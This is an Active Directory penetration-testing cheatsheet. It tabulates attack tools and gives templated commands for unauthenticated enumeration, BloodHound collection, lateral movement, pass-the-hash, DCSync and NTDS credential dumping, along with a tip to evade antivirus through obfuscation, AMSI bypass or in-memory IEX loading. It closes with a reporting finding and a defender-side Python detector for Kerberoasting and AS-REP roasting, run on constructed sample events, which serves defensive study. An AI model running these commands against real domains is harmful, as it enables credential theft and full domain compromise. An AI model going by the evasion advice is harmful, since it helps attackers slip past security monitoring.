Methodology Checklist
- Unauthenticated phase: Kerbrute, rpcclient NULL, enum4linux-ng
- First credential: BloodHound.py, PowerView, Snaffler, GetUserSPNs
- Lateral movement: Impacket psexec/wmiexec/smbexec, evil-winrm, NXC
- Domain compromise: secretsdump DCSync, Mimikatz DCSync, NTDS dump
- Kerberos attacks: Rubeus (Windows), impacket-GetUserSPNs/GetNPUsers (Linux)
- ACL abuse: PowerView + BloodHound ACL edges
- Select tool based on OS context and EDR presence
Operational Context
Use when: Selecting the right AD enumeration tool for the current access level and constraints; a quick lookup for PowerView vs ldapsearch vs BloodHound vs native commands.
Think Dumber First: Use BloodHound first if you have any creds. PowerView for targeted property queries. Native commands when tools are blocked. Match the tool to the access level; don't use credentialed tools before you have creds.
Skip when: N/A; this is a reference document.
Tactical Cheatsheet
| Tool | Primary Use |
|---|---|
| PowerView.ps1 / SharpView | AD situational awareness, targeted object queries, Kerberoastable/ASREPRoastable user finding |
| BloodHound | Visual AD relationship mapping, shortest attack path discovery |
| SharpHound.exe | C# BloodHound data collector; generates JSON for BH import |
| BloodHound.py | Python BH ingestor; runs from a non-domain-joined attack box |
| Kerbrute | Kerberos pre-auth user enumeration, password spraying, brute force |
| Impacket | Python toolkit; covers nearly all AD attack surfaces |
| Responder | LLMNR/NBT-NS/MDNS poisoner; captures NTLMv2 hashes |
| Inveigh.ps1 / InveighZero | Windows-based LLMNR poisoner (PowerShell/C#) |
| Rubeus | Kerberos abuse tool: Kerberoasting, AS-REP, Pass-the-Ticket, S4U |
| Mimikatz | LSASS dump, PtH, plaintext extraction, Kerberos ticket extraction |
| CrackMapExec / NetExec (nxc) | SMB/WMI/WinRM enumeration, spray, dump, lateral movement |
| evil-winrm | Interactive WinRM shell |
| rpcclient | RPC-based AD enumeration from Linux |
| enum4linux / enum4linux-ng | SMB/Samba AD enumeration |
| ldapsearch / windapsearch | LDAP queries for AD objects |
| Snaffler | File share credential/secret hunting across AD |
| secretsdump.py | Remote SAM/LSA/NTDS dump |
| psexec.py | Semi-interactive shell via SMB |
| wmiexec.py | Command execution via WMI |
| smbclient.py / smbmap | Share enumeration, file access |
| GetUserSPNs.py | Kerberoasting (list SPN accounts + request TGS) |
| GetNPUsers.py | ASREPRoasting (list + dump AS-REP hashes) |
| ntlmrelayx.py | NTLM relay attacks |
| PetitPotam.py | NTLM coercion via MS-EFSRPC |
| noPac.py | CVE-2021-42278/42287: machine account → DA impersonation |
| mssqlclient.py | MSSQL interaction (xp_cmdshell, xp_dirtree) |
| lookupsid.py | SID brute-force for RID enumeration |
| ticketer.py | TGT/TGS ticket creation and customization |
| gettgtpkinit.py | Certificate → TGT (ADCS attacks) |
| getnthash.py | TGT → NT hash via U2U (Shadow Credentials) |
| DomainPasswordSpray.ps1 | PowerShell domain password spraying |
| LAPSToolkit | LAPS auditing and password retrieval |
| gpp-decrypt | Decrypt Group Policy Preferences cpassword |
| adidnsdump | AD-integrated DNS zone dump |
| PingCastle | AD security risk assessment (CMMI-based) |
| Group3r | GPO misconfiguration auditing |
| ADRecon | AD data extraction to Excel format |
| setspn.exe | Read/modify/delete SPNs on AD service accounts |
| raiseChild.py | Child-to-parent domain privilege escalation |
| rpcdump.py | RPC endpoint mapper |
| smbserver.py | Instant SMB server for file transfer |
| AD Explorer | GUI AD viewer/editor + offline snapshot comparison |
Deep Dive & Workflow
Tool Selection by Phase
Unauthenticated / NULL Session Phase:
```
kerbrute userenum --dc [DC_IP] -d [DOMAIN] userlist.txt   # user enum via Kerberos
nxc smb [DC_IP] -u '' -p '' --users                        # NULL session user list
rpcclient -U "" -N [DC_IP]                                 # NULL session RPC
enum4linux-ng [DC_IP]                                      # full SMB/RPC enum
```
First Credential / Enumeration Phase:
```
# BloodHound data collection
bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All
# Or via SharpHound (from Windows):
.\SharpHound.exe -c All --zipfilename loot.zip
# PowerView targeted queries:
Get-DomainUser -SPN                   # Kerberoastable
Get-DomainUser -PreauthNotRequired    # ASREPRoastable
Get-DomainGroup -AdminCount
Get-DomainComputer -Unconstrained     # Unconstrained delegation
# Snaffler for share cred hunting:
.\Snaffler.exe -s -o snaffler_output.txt
```
Lateral Movement Phase:
```
# Impacket lateral movement options:
impacket-psexec [DOMAIN]/[USER]:[PASS]@[TARGET_IP]
impacket-wmiexec [DOMAIN]/[USER]:[PASS]@[TARGET_IP]
impacket-smbexec [DOMAIN]/[USER]:[PASS]@[TARGET_IP]
evil-winrm -i [TARGET_IP] -u [USER] -p [PASS]
# Pass-the-Hash:
impacket-psexec [DOMAIN]/[USER]@[TARGET_IP] -hashes :[NTLM_HASH]
nxc smb [TARGET_IP] -u [USER] -H [NTLM_HASH]
```
Domain Compromise Phase:
```
# DCSync (from Linux):
impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm
# Mimikatz DCSync (from Windows):
lsadump::dcsync /user:[DOMAIN]\[USER]
lsadump::dcsync /all /csv
# NTDS.dit dump:
nxc smb [DC_IP] -u [USER] -p [PASS] --ntds
```
Impacket Quick Reference
```
# Most used impacket scripts:
impacket-secretsdump    # dump SAM/LSA/NTDS
impacket-psexec         # SMB SYSTEM shell
impacket-wmiexec        # WMI exec (SYSTEM)
impacket-smbexec        # Service exec
impacket-mssqlclient    # MSSQL interactive
impacket-ntlmrelayx     # NTLM relay
impacket-GetUserSPNs    # Kerberoast
impacket-GetNPUsers     # ASREPRoast
impacket-lookupsid      # RID brute
impacket-ticketer       # Ticket forge
impacket-smbserver      # Quick SMB share
impacket-rpcdump        # RPC endpoint map
```
BloodHound Key Queries
- "Shortest Paths to Domain Admins"
- "Shortest Paths to Domain Admins from Owned Principals"
- "Find Computers with Unconstrained Delegation"
- "Find AS-REP Roastable Users"
- "Shortest Paths from Kerberoastable Users"
- "Users with DCSync Rights"
- "Transitive Object Control" (for ACL abuse chains)
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Unsure which tool to use | Access level unclear | Determine: unauthenticated → enum4linux; creds on Linux → ldapdomaindump/bloodhound-python; creds on Windows → SharpHound/PowerView |
| Tool blocked by AV | Default signatures | Rename binary, obfuscate, or use AMSI bypass; PowerView can be loaded via IEX from memory |
| BloodHound data stale | Collected too early | Re-run SharpHound after privilege escalation to capture new ACL edges visible with higher privileges |
| ldapsearch returns too much data | No filter applied | Filter: `ldapsearch -x ... '(objectClass=user)' sAMAccountName` to limit the attributes returned |
| Tool version mismatch | SharpHound vs BloodHound CE incompatibility | Match versions: BloodHound CE requires SharpHound 2.x; Legacy BloodHound uses SharpHound 1.x |
Reporting Trigger
Finding Title: AD Enumeration Toolset Provides Comprehensive Domain Visibility
Impact: The combination of BloodHound, PowerView, ldapdomaindump, and native LDAP queries provides complete AD attack surface mapping, including shortest paths to Domain Admin, Kerberoastable accounts, and ACL abuse opportunities.
Root Cause: Legitimate AD enumeration tools are dual-use and indistinguishable from normal IT administration at the protocol level.
Recommendation: Implement Microsoft Defender for Identity to detect tool-specific query patterns. Alert on SharpHound LDAP collection signatures. Enforce least-privilege AD read permissions to limit the data returned to standard users.
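The recommendation above is to detect the patterns these tools leave rather than try to block dual-use binaries. As an added defender-side example that is not part of this cheatsheet, the Python below runs two classic Kerberos detections over constructed Windows Security event records: a Kerberoasting signature (Event 4769, RC4 ticket encryption type 0x17, one account requesting service tickets for many distinct SPNs inside a short window, which is what GetUserSPNs/Rubeus produce) and an AS-REP roasting signature (Event 4768 with PreAuthType 0 and RC4, which is what GetNPUsers produces). Field names follow the EventData names of those two events; the sample records, the thresholds, and the helper names (`ev`, `detect_kerberoast`, `detect_asrep_roast`) are assumptions chosen for this example.

```python
"""Detection over Windows Security events for two Kerberos abuse patterns.

Added example (not part of the original cheatsheet). Field names follow the
EventData names of Security events 4768 (TGT request) and 4769 (service
ticket request); the sample records, thresholds and helper names are
constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType value for RC4-HMAC
NO_PREAUTH = "0"    # PreAuthType 0: logon without pre-authentication


def ev(event_id, time_created, **fields):
    """Build one constructed event record in the dict shape the detectors read."""
    return {"EventID": event_id, "TimeCreated": time_created, **fields}


# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    # One account pulling RC4 service tickets for six SPNs within 90 seconds
    ev(4769, "2024-05-01T09:00:01", TargetUserName="jdoe@CORP.LOCAL", ServiceName="svc_sql", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    ev(4769, "2024-05-01T09:00:03", TargetUserName="jdoe@CORP.LOCAL", ServiceName="svc_web", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    ev(4769, "2024-05-01T09:00:04", TargetUserName="jdoe@CORP.LOCAL", ServiceName="svc_backup", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    ev(4769, "2024-05-01T09:00:06", TargetUserName="jdoe@CORP.LOCAL", ServiceName="svc_sccm", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    ev(4769, "2024-05-01T09:00:09", TargetUserName="jdoe@CORP.LOCAL", ServiceName="svc_exchange", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    ev(4769, "2024-05-01T09:01:30", TargetUserName="jdoe@CORP.LOCAL", ServiceName="svc_file", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    # krbtgt and machine-account services are filtered out (not roastable targets)
    ev(4769, "2024-05-01T09:01:31", TargetUserName="jdoe@CORP.LOCAL", ServiceName="krbtgt", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    ev(4769, "2024-05-01T09:01:32", TargetUserName="jdoe@CORP.LOCAL", ServiceName="WS01$", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    # Ordinary activity: one RC4 ticket and one AES-256 (0x12) ticket
    ev(4769, "2024-05-01T09:10:00", TargetUserName="asmith@CORP.LOCAL", ServiceName="svc_sql", TicketEncryptionType="0x17", IpAddress="10.0.0.77"),
    ev(4769, "2024-05-01T09:10:05", TargetUserName="asmith@CORP.LOCAL", ServiceName="svc_web", TicketEncryptionType="0x12", IpAddress="10.0.0.77"),
    # TGT requests: two accounts without pre-auth answered with RC4, one normal logon
    ev(4768, "2024-05-01T09:05:00", TargetUserName="svc_legacy", PreAuthType="0", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    ev(4768, "2024-05-01T09:05:01", TargetUserName="backup_admin", PreAuthType="0", TicketEncryptionType="0x17", IpAddress="10.0.0.50"),
    ev(4768, "2024-05-01T09:05:02", TargetUserName="jdoe", PreAuthType="2", TicketEncryptionType="0x12", IpAddress="10.0.0.50"),
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def detect_kerberoast(events, window_minutes=5, min_services=5):
    """Flag accounts that requested RC4 service tickets for >= min_services
    distinct non-machine services inside any window_minutes-long window."""
    by_account = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        service = e["ServiceName"]
        if service.lower() == "krbtgt" or service.endswith("$"):
            continue  # TGT renewals and computer accounts are not roast targets
        by_account[e["TargetUserName"]].append((_ts(e), service))

    window = timedelta(minutes=window_minutes)
    alerts = []
    for account, requests in by_account.items():
        requests.sort()
        busiest = set()
        # Slide a window starting at each request; keep the largest service set seen
        for i, (start, _) in enumerate(requests):
            in_window = {svc for t, svc in requests[i:] if t - start <= window}
            if len(in_window) > len(busiest):
                busiest = in_window
        if len(busiest) >= min_services:
            alerts.append({"rule": "kerberoast_rc4_burst", "account": account,
                           "services": sorted(busiest)})
    return alerts


def detect_asrep_roast(events, min_accounts=1):
    """Flag source IPs that obtained RC4 AS-REPs for accounts with
    pre-authentication disabled (PreAuthType 0)."""
    by_ip = defaultdict(set)
    for e in events:
        if e["EventID"] != 4768:
            continue
        if e.get("PreAuthType") != NO_PREAUTH or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        by_ip[e["IpAddress"]].add(e["TargetUserName"])
    return [{"rule": "asrep_roast_no_preauth_rc4", "source_ip": ip, "accounts": sorted(accts)}
            for ip, accts in sorted(by_ip.items()) if len(accts) >= min_accounts]


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS) + detect_asrep_roast(SAMPLE_EVENTS):
        print(alert)
```

Both rules are tuning points rather than fixed signatures: raise `min_accounts` where some accounts legitimately run with pre-auth disabled, and widen `window_minutes` to catch a collector that throttles its requests. The exclusions for krbtgt and `$` accounts keep normal TGT renewals and computer traffic out of the Kerberoast count. The durable fix on the AD side is the one the page's recommendation points at: enforce pre-auth, move service accounts to AES-only, and keep SPN-bearing accounts on long managed passwords so an RC4 ticket is rare enough to be worth an alert on its own.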